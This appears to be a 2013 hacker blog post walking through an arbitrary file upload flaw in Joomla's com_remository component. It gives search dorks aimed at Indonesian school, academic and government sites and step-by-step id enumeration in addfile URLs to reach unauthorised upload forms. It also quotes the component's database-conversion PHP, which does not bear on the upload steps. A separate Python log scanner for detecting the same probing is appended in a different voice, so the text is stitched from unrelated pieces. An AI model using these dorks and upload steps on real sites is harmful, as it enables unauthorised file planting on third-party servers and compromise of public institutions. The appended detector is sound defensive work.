Friday, 19 April 2013


Joomla Component -> com_remository -> Arbitrary File Upload Vulnerability

<< Author : Z190T

<< Contact : mahruz[dot]id[at]gmail[dot]com

<< Homepage : http://mahruz-id.com/

<< Vendor : http://remository.com/downloads/

<< d0rk :

- inurl:"func=addfile" <– Organisation, School, Academic and Government of Indonesian Site

- inurl:"/func,addfile/" <– Organisation, School, Academic and Government of Indonesian Site

- inurl:"index.php?option=com_remository" <– free!!

<< File Allowed : Any File Extension

<< Try 0n : any OS


<< readme.

First of all,, I just want to point out one important thing about how important it is to be careful when choosing plugins or web components, whether on Joomla, WordPress, Drupal or anything else. It doesn't matter whether the preview of the website we build looks good; a nice preview doesn't guarantee a website's security. What matters is how a website we own looks simple while being backed by an above-average security setup.



I'm going to show one of the many weaknesses in Joomla components, namely Repository. The repository meant here is a store of materials or download files that is made openly available to users, admins and even every visitor.



Remository is the renamed Repository found on Joomla; I don't know,,, I don't get it either, why does it have to use the name Remository??

Whatever!!.

Enough,, it takes too long to read my rambling writing!! Let's get straight to it...



<< For the dorks [inurl:"func=addfile"] and [inurl:"index.php?option=com_remository"]

Example :

http://localhost/index.php?option=com_remository&Itemid=46&func=addfile&id=15

“You have no permitted upload categories – please refer to the webmaster”

There we can see that we don't have permission to upload data with id 15 in section 46; only the Admin is allowed to upload data to that area. So,,, how do we get to upload data to that area? Ooo,,,, no waaay...!! <- only a fool would say that!. We manipulate the data we're going to submit!!, Let's do it!!

Leave the ItemId part as it is; the only thing we change is the id. Poke at it a bit so the upload table shows up!! ^_^

http://localhost/index.php?option=com_remository&Itemid=46&func=addfile&id=1

http://localhost/index.php?option=com_remository&Itemid=46&func=addfile&id=2

http://localhost/index.php?option=com_remository&Itemid=46&func=addfile&id=3

http://localhost/index.php?option=com_remository&Itemid=46&func=addfile&id=4

http://localhost/index.php?option=com_remository&Itemid=46&func=addfile&id=5

and so on.. until the thing pops out!! heheheheee....

If you get bored poking at it, just jump straight to a high number,, for example,,

http://localhost/index.php?option=com_remository&Itemid=46&func=addfile&id=99

but,, if for example we get a hit at..

http://localhost/index.php?option=com_remository&Itemid=46&func=addfile&id=8

upload right away!!, don't forget,, fill in the form,, so it's easy to find the directory where the upload landed.

All Done!

Please Note: All Uploads will be reviewed prior to Publishing.

Yes!! we succeeded!!

The part about finding the uploaded file is, in my opinion, a bit difficult, because the file we uploaded has already gone through the converter in ../remositoryAdminDbconvert.php

its contents look like this..

<?php

// Admin controller that migrates the old downloads tables into the
// #__downloads_* schema (comments added here; the code is the component's own).
class remositoryAdminDbconvert extends remositoryAdminControllers {

    function remositoryAdminDbconvert ($admin) {
        remositoryAdminControllers::remositoryAdminControllers ($admin);
        $_REQUEST['act'] = 'dbconvert';
    }
   
    // Wipes the new tables, then copies categories, folders, files and comments across.
    function listTask () {
        $view =& new remositoryAdminHTML ($this, 0, '');
        $view->formStart(_DOWN_ADMIN_ACT_DBCONVERT);
        $interface =& remositoryInterface::getInstance();
        $database =& $interface->getDB();
        // Every target table is emptied before the migration starts.
        foreach (array('containers','files','reviews','structure','log','temp') as $tablename) {
            $sql = "TRUNCATE TABLE #__downloads_$tablename";
            remositoryRepository::doSQL($sql);
        }
        $sql = "ALTER TABLE #__downloads_containers AUTO_INCREMENT=2";
        remositoryRepository::doSQL($sql);
        $containermap = array('catid'=>array(),'folderid'=>array());
        $sql = "SELECT * FROM #__downloads_category";
        $database->setQuery($sql);
        $rows = $database->loadObjectList();
        if (!$rows) $rows = array();
        foreach ($rows as $row) {
            if ($row->registered) $row->registered = '0';
            else $row->registered = '2';
            foreach ($row as $field=>$value) {
                if (!is_numeric($row->$field)) $row->$field = $database->getEscaped($row->$field);
            }
            $sql = "INSERT INTO #__downloads_containers (parentid,name,published,description,filecount,icon,registered) VALUES (0,'$row->name',$row->published,'$row->description',$row->files,'$row->icon',$row->registered)";
            $database->setQuery($sql);
            if (!$database->query()) {
                echo "<script> alert('".$database->getErrorMsg()."'); window.history.go(-1); </script>\n";
                exit();
            }
            $newid = $database->insertid();
            $containermap['catid'][$row->id] = $newid;
            $sql = "SELECT * FROM #__downloads_folders WHERE catid=$row->id";
            $database->setQuery($sql);
            $folders = $database->loadObjectList();
            if ($folders) {
                foreach ($folders as $folder) $this->convertfolder ($folder, $newid, $containermap);
            }
        }
        $sql = "SELECT * FROM #__downloads";
        $database->setQuery($sql);
        $files = $database->loadObjectList();
        if (!$files) $files = array();
        // Each old file row is classified as remote (URL) or local (present in Down_Path).
        foreach ($files as $file) {
            $testurl = strtolower(trim($file->url));
            $findsite = strpos($testurl, strtolower(trim($interface->getCfg('live_site'))));
            if ($findsite===false){
                $islocal = '0';
                $realname = '';
                $filedate = date('Y-m-d');
                $url = $file->url;
                if (eregi(_REMOSITORY_REGEXP_URL,$url) OR eregi(_REMOSITORY_REGEXP_IP,$url)) $filefound = true;
                else $filefound = false;
            }
            else {
                $islocal = '1';
                $url_array=explode('/',$file->url);
                $url = '';
                $realname = $url_array[(count($url_array)-1)];
                $filepath = $this->repository->Down_Path.'/'.$realname;
                if (file_exists($filepath)) {
                    $filefound = true;
                    $filedate = date('Y-m-d', filemtime($this->repository->Down_Path.'/'.$realname));
                }
                else $filefound = false;
            }
            $containerid = 0;
            if ($file->catid != 0) {
                if (isset($containermap['catid'][$file->catid])) $containerid = $containermap['catid'][$file->catid];
                else echo '<tr><td>'.$file->id.'/'.$realname.'/'.$file->catid.'</td></tr>';
            }
            if ($file->folderid != 0) {
                if (isset($containermap['folderid'][$file->folderid])) $containerid = $containermap['folderid'][$file->folderid];
                else echo '<tr><td>'.$file->id.'/'.$realname.'/'.$file->folderid.'</td></tr>';
            }
            if ($filefound AND $containerid != 0) {
                foreach (get_class_vars(get_class($file)) as $field=>$value) if (is_string($file->$field)) $file->$field = $database->getEscaped($file->$field);
                $sql="INSERT INTO #__downloads_files (realname,islocal,containerid,published,url,description,smalldesc,autoshort,license,licenseagree,filetitle,filesize,filetype,downloads,icon,fileversion,fileauthor,filedate,filehomepage,screenurl,submittedby,submitdate) VALUES ('$realname',$islocal,$containerid,$file->published,'$url','$file->description','$file->smalldesc',$file->autoshort,'$file->license',$file->licenseagree,'$file->filename','$file->filesize','$file->filetype','$file->downloads','$file->icon','$file->fileversion','$file->fileauthor','$filedate','$file->filehomepage','$file->screenurl', $file->submittedby,'$file->submitdate')";
                $database->setQuery($sql);
                if (!$database->query()) {
                    echo "<script> alert('".$database->getErrorMsg()."'); window.history.go(-1); </script>\n";
                    exit();
                }
                $newid = $database->insertid();
                $sql = "SELECT * FROM #__downloads_comments WHERE id=$file->id";
                $database->setQuery($sql);
                $comments = $database->loadObjectList();
                if ($comments) {
                    foreach ($comments as $comment) {
                        $sql = "INSERT INTO #__downloads_reviews (component,itemid,userid,title,comment,date) VALUES ('com_remository',$newid,'$comment->userid','Review Title','$comment->comment','$comment->time')";
                        $database->setQuery($sql);
                        remositoryRepository::doSQL($sql);
                    }
                }
            }
            else echo '<tr><td>'.$file->url.'</td></tr>';
        }
        $this->repository->resetCounts(array());
        echo '<tr><td class="message">'._DOWN_DB_CONVERT_OK.'</td></tr>';
        echo '</table></form>';
    }
   
    function convertfolder ($folder, $parent, &$containermap) {
        $interface =& remositoryInterface::getInstance();
        $database =& $interface->getDB();
        foreach ($folder as $field=>$value) {
            if (!is_numeric($folder->$field)) $folder->$field = $database->getEscaped($folder->$field);
        }
        if ($folder->registered) $folder->registered = '0';
        else $folder->registered = '2';
        $sql = "INSERT INTO #__downloads_containers (parentid,name,published,description,filecount,icon,registered) VALUES ($parent, '$folder->name', $folder->published, '$folder->description', '$folder->files', '$folder->icon', $folder->registered)";
        $database->setQuery($sql);
        if (!$database->query()) {
            echo "<script> alert('".$database->getErrorMsg()."'); window.history.go(-1); </script>\n";
            exit();
        }
        $newid = $database->insertid();
        $containermap['folderid'][$folder->id] = $newid;
        $sql = "SELECT * FROM #__downloads_folders WHERE parentid=$folder->id";
        $database->setQuery($sql);
        $children = $database->loadObjectList();
        if ($children) {
            // Recurse into sub-folders; the original called convertfolder() without $this->, which is undefined as a plain function.
            foreach ($children as $child) $this->convertfolder ($child, $newid, $containermap);
        }
    }

}

?>
Go ahead and work it out for yourself!! ^_^ heheheee....

<< For the dork [inurl:"/func,addfile/"]

Example :

http://localhost/index.php/downloads/func-addfile/

The way to poke at it isn't much different,, just add /id/(number). for example..

http://localhost/index.php/downloads/func-addfile/id/99
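Seen from the defender's side: as an added example (not from the original post), here is a Python log scanner that flags the request pattern described above in both URL forms, `func=addfile&id=N` and `/func-addfile/id/N`: one client probing several ids and then POSTing to the one that accepted. The sample log lines, the threshold of three distinct ids and the alert layout are constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed sample access-log lines (Apache combined format), not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [19/Apr/2013:10:01:01 +0700] "GET /index.php?option=com_remository&Itemid=46&func=addfile&id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [19/Apr/2013:10:01:02 +0700] "GET /index.php?option=com_remository&Itemid=46&func=addfile&id=2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [19/Apr/2013:10:01:03 +0700] "GET /index.php?option=com_remository&Itemid=46&func=addfile&id=3 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [19/Apr/2013:10:01:04 +0700] "GET /index.php?option=com_remository&Itemid=46&func=addfile&id=8 HTTP/1.1" 200 9870 "-" "Mozilla/5.0"
10.0.0.5 - - [19/Apr/2013:10:01:30 +0700] "POST /index.php?option=com_remository&Itemid=46&func=addfile&id=8 HTTP/1.1" 200 7000 "-" "Mozilla/5.0"
10.0.0.9 - - [19/Apr/2013:10:05:00 +0700] "GET /index.php/downloads/func-addfile/id/99 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# Client IP, HTTP method, request path and status from a combined-format log line.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) HTTP/[\d.]+" (\d{3})')
SEF_RE = re.compile(r"/func[-,]addfile/id/(\d+)")  # SEF form: /func-addfile/id/N or /func,addfile/id/N
QUERY_ID_RE = re.compile(r"[?&]id=(\d+)")           # id=N in the classic query-string form

def extract_addfile_id(path):
    """Return the category id targeted by an addfile request, or None if it is not one."""
    m = SEF_RE.search(path)
    if m:
        return int(m.group(1))
    if "func=addfile" in path:
        m = QUERY_ID_RE.search(path)
        if m:
            return int(m.group(1))
    return None

def analyse(log_text, threshold=3):
    """Flag clients that probed >= threshold distinct addfile ids or POSTed an upload."""
    probed = defaultdict(set)
    uploaded = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, method, path = m.group(1), m.group(2), m.group(3)
        cid = extract_addfile_id(path)
        if cid is None:
            continue
        probed[ip].add(cid)
        if method == "POST":
            uploaded[ip].add(cid)
    alerts = {}
    for ip, ids in probed.items():
        if len(ids) >= threshold or uploaded.get(ip):
            alerts[ip] = {"probed": sorted(ids), "uploaded_to": sorted(uploaded.get(ip, ()))}
    return alerts
```

Run `analyse(SAMPLE_LOG)` to get one alert for 10.0.0.5 (ids 1, 2, 3, 8 probed, upload to 8) while the single SEF request from 10.0.0.9 stays below the threshold.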
